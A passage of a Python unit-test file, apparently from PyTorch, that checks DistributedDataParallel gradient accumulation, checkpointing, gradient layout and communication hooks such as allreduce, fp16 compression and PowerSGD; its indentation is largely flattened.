store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
local_batch_size = len(devices)
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
if ddp_comm_hook is not None:
ddp_model.register_comm_hook(process_group, ddp_comm_hook)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
with ddp_model.no_sync():
ddp_model.train()
ddp_model(input)
# check the parameters of the two models over num_iters iterations
for iteration in range(num_iters):
# single cpu/gpu training
step_model(model, input, target)
ddp_input = input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
ddp_target = target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
if iteration % num_iters == 0:
# accumulate grads locally
with ddp_model.no_sync():
step_model(ddp_model, ddp_input, ddp_target)
else:
# sync grads
step_model(ddp_model, ddp_input, ddp_target)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if iteration % num_iters == 0:
self.assertNotEqual(i.grad, j.grad)
else:
self.assertEqual(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_grad_is_view(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_hook(self):
"""
Runs multiple iterations of _test_accumulate_gradients_no_sync using an
allreduce hook and validates that the future result is properly passed
as gradients to the reducer.
"""
def allreduce_hook(
process_group: object, bucket: dist.GradBucket
) -> torch._C.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
return process_group.allreduce(tensors).get_future()
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_hook
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_with_then_hook(self):
"""
Runs multiple iterations of _test_accumulate_gradients_no_sync using an allreduce
hook that also uses then callbacks. The first then callback multiplies the result
by 2, and the second callback divides it by 2 * world_size. It validates that the
final result is properly passed as gradients to the reducer.
"""
def allreduce_with_then_hook(
process_group: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = process_group.allreduce(bucket.get_tensors()).get_future()
def mult(fut):
# Multiply the result by 2.
return [2 * t for t in fut.wait()]
def div(fut):
# Divide the result by 2 * world_size.
return [t / (2 * self.world_size) for t in fut.wait()]
return fut.then(mult).then(div)
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_with_then_hook
)
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement gradient accumulation, but
# we would like to make sure DDP does not interfere with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check the parameters of the two models over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_gloo()
def test_ignored_output(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutput(nn.Module):
def __init__(self):
super(IgnoredOutput, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutput().float(),
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_gloo()
def test_ignored_output_with_unused_parameters(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called, even if not all model
parameters participated in computing the model output.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutputWithUnusedParameters(nn.Module):
def __init__(self):
super(IgnoredOutputWithUnusedParameters, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutputWithUnusedParameters().float(),
process_group=process_group,
find_unused_parameters=True,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_save_load_checkpoint(self):
dist.init_process_group(
"gloo",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
def train_loop(model, optimizer, iterations):
for _ in range(iterations):
optimizer.zero_grad()
output = model(input)
loss = criterion(output, target)
loss.backward()
optimizer.step()
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model_withload = TestModel().float().to(device_id)
model_withoutload = TestModel().float().to(device_id)
ddp_withload = DistributedDataParallel(
model_withload,
device_ids=[device_id],
)
ddp_withoutload = DistributedDataParallel(
model_withoutload,
device_ids=[device_id],
)
# Ensure that all three models start with the same set of parameters; by default they are randomly initialized on construction.
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
for p in model_withload.parameters():
with torch.no_grad():
p.zero_()
for p in ddp_withoutload.parameters():
with torch.no_grad():
p.zero_()
batch_size = 4
criterion = nn.CrossEntropyLoss()
optimizer_withload = torch.optim.SGD(ddp_withload.parameters(), lr=0.001)
optimizer_non_ddp_withload = torch.optim.SGD(model_withload.parameters(), lr=0.001)
optimizer_withoutload = torch.optim.SGD(ddp_withoutload.parameters(), lr=0.001)
input = torch.rand([batch_size, 2], dtype=torch.float).to(device_id)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# run the model for 6 iterations, with a checkpoint in the middle
train_loop(ddp_withload, optimizer_withload, 3)
# zero out parameters of both DDP and non-DDP models and reload them from the DDP state dict
checkpoint_path = tempfile.gettempdir() + "/model.checkpoint"
if self.rank == 0:
torch.save(ddp_withload.state_dict(), checkpoint_path)
dist.barrier()
map_location = {"cuda:%d" % 0: "cuda:%d" % self.rank}
ddp_state_dict = torch.load(checkpoint_path, map_location=map_location)
for model in [ddp_withload, model_withload]:
for p in model.parameters():
with torch.no_grad():
p.zero_()
ddp_withload.load_state_dict(ddp_state_dict)
# the non-DDP model needs to first remove the prefix of "module." from the DDP state dict
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, "module.")
model_withload.load_state_dict(ddp_state_dict)
train_loop(ddp_withload, optimizer_withload, 3)
train_loop(model_withload, optimizer_non_ddp_withload, 3)
# re-run the model with the same inputs for 6 iterations with no checkpoint
train_loop(ddp_withoutload, optimizer_withoutload, 6)
for p_withload, p_withoutload, p_non_ddp_withload in zip(
ddp_withload.parameters(), ddp_withoutload.parameters(), model_withload.parameters()
):
self.assertEqual(p_withload, p_withoutload)
self.assertEqual(p_non_ddp_withload, p_withoutload)
def _run_and_verify_sparse_gradients(self, vanilla_model, ddp_model):
mult = 2
batch_size = mult * self.world_size
criterion = nn.CrossEntropyLoss()
input = torch.randint(0, 10, [batch_size, 2])
target = torch.randint(0, 10, [batch_size])
# Run with entire batch against single process version
criterion(vanilla_model(input), target).backward()
# Run with partial batch against multi process version
partial_input = input.split(mult)[self.rank]
partial_target = target.split(mult)[self.rank]
criterion(ddp_model(partial_input), partial_target).backward()
# Check that the gradients are sparse and identical
vanilla_parameter = next(vanilla_model.parameters())
ddp_parameter = next(ddp_model.parameters())
self.assertEqual(vanilla_parameter.grad, ddp_parameter.grad)
def _test_sparse_gradients(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
@requires_gloo()
def test_sparse_gradients(self):
self._test_sparse_gradients()
@requires_gloo()
def test_sparse_gradients_grad_is_view(self):
self._test_sparse_gradients(gradient_as_bucket_view=True)
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to construct this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
@requires_gloo()
def test_ddp_comm_hook_future_passing_cpu(self):
"""
This unit test verifies whether the Future object is passed properly.
The callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
ModuleForDdpCommHook().cpu(), process_group=process_group
)
# Register DDP Communication Hook
cpu_model.register_comm_hook(None, self._simple_hook)
# check whether the grads are equal to what the then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(cpu_model, 8, 2 * torch.ones(2, 2))
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
for p in model.parameters():
    self.assertEqual(p.grad, expected_grad)
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = torch.futures.Future()
fut.set_result([torch.ones_like(t) for t in bucket.get_tensors()])
def fut_then(fut):
# Add ones to fut's result.
return [t + torch.ones_like(t) for t in fut.value()]
return fut.then(fut_then)
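# _simple_hook ignores the bucket contents entirely: it resolves the future with
# all-ones tensors and the then callback adds ones again, so every gradient is
# expected to come out as 2 * torch.ones(...) regardless of the allreduce result,
# which is what the 2 * torch.ones(2, 2) checks in the surrounding tests verify.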
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_gloo(self):
"""
This unit test verifies whether the Future object is passed properly using gloo backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result as the case of no hook registered.
Without a then callback, the future value in the reducer is no longer
a PyObject, and this unit test verifies that future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(state: object, bucket: dist.GradBucket) -> torch._C.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
return process_group.allreduce(tensors).get_future()
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result as the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [(powerSGD.powerSGD_hook, powerSGD_state), (default.allreduce_hook, process_group)]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result as the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result as the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return [10 * t for t in fut.value()]
def div(fut):
# Divide the result by 2.
return [0.5 * t for t in fut.value()]
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# Check whether the grads are equal to the allreduced average multiplied by 5.
# Without the comm_hook, the result would still be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
@requires_gloo()
def test_ddp_invalid_comm_hook_init(self):
"""
This unit test makes sure that register_comm_hook properly checks the format
of the hook defined by the user. The Python hook must be callable. This test
also checks whether the bucket annotation is validated properly if defined.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(TypeError, "Communication hook must be callable."):
model.register_comm_hook(state=None, hook=1)
with self.assertRaisesRegex(
ValueError, "bucket annotation should be dist.GradBucket."
):
def comm_hook(state: object, bucket: int) -> torch.futures.Future:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
@requires_gloo()
def test_ddp_invalid_comm_hook_return_type(self):
"""
This test checks whether the return annotation is validated properly if defined.
